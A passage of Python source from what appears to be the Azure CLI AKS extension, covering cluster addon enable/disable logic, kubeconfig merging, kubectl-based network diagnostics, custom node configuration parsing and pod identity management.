if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet; we will grant the vnet-level Contributor role
            # in a later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon in [CONST_MONITORING_ADDON_NAME, CONST_AZURE_DEFENDER_ADDON_NAME]:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID if addon == CONST_MONITORING_ADDON_NAME else CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError(f'The {addon} addon is already enabled for this managed cluster.\n'
                                   f'To change {addon} configuration, run "az aks disable-addons -a {addon}" '
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
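# A minimal usage sketch for _print_or_merge_credentials (the variable names below are
# hypothetical, not part of this module). Passing "-" prints the kubeconfig to stdout;
# any other path merges the new kubeconfig into that file:
#
#   _print_or_merge_credentials("-", kubeconfig_yaml, overwrite_existing=False, context_name=None)
#   _print_or_merge_credentials(os.path.expanduser("~/.kube/config"), kubeconfig_yaml,
#                               overwrite_existing=False, context_name="my-cluster")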
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
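# Illustrative example for get_aks_custom_headers (header names/values are hypothetical):
# a string of the form "Key1=Value1,Key2=Value2" is split on commas and then on '=',
# so for instance
#   get_aks_custom_headers("UseGPUDedicatedVHD=true,AKSHTTPCustomFeatures=foo")
#   -> {"UseGPUDedicatedVHD": "true", "AKSHTTPCustomFeatures": "foo"}
# Any pair without exactly one '=' raises CLIError('custom headers format is incorrect').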
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
    # some addons require post-cluster-creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'the ACR to it. You can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
                               'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
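# Example kubelet configuration file consumed by _get_kubelet_config (an illustrative
# sketch; only the keys read above are shown, and the values are placeholders — see
# https://aka.ms/CustomNodeConfig for the authoritative schema):
#
#   {
#     "cpuManagerPolicy": "static",
#     "cpuCfsQuota": true,
#     "cpuCfsQuotaPeriod": "200ms",
#     "imageGcHighThreshold": 85,
#     "imageGcLowThreshold": 80,
#     "topologyManagerPolicy": "best-effort",
#     "allowedUnsafeSysctls": ["kernel.msg*", "net.*"],
#     "failSwapOn": false
#   }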
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
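# Example Linux OS configuration file consumed by _get_linux_os_config (an illustrative
# sketch with placeholder values; only a subset of the sysctl keys read above is shown):
#
#   {
#     "transparentHugePageEnabled": "madvise",
#     "transparentHugePageDefrag": "defer+madvise",
#     "swapFileSizeMB": 1500,
#     "sysctls": {
#       "netCoreSomaxconn": 16384,
#       "netIpv4TcpTwReuse": true,
#       "fsInotifyMaxUserWatches": 1048576,
#       "vmMaxMapCount": 262144
#     }
#   }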
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
if not _is_pod_identity_addon_enabled(instance):
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
        # not set this time, read from previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
if not enable:
# when disable, remove previous saved value
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=False)
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=enable,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
_ensure_pod_identity_kubenet_consent(
instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
instance.pod_identity_profile.enabled = enable
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(
instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission for cluster')
    # need more time to propagate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
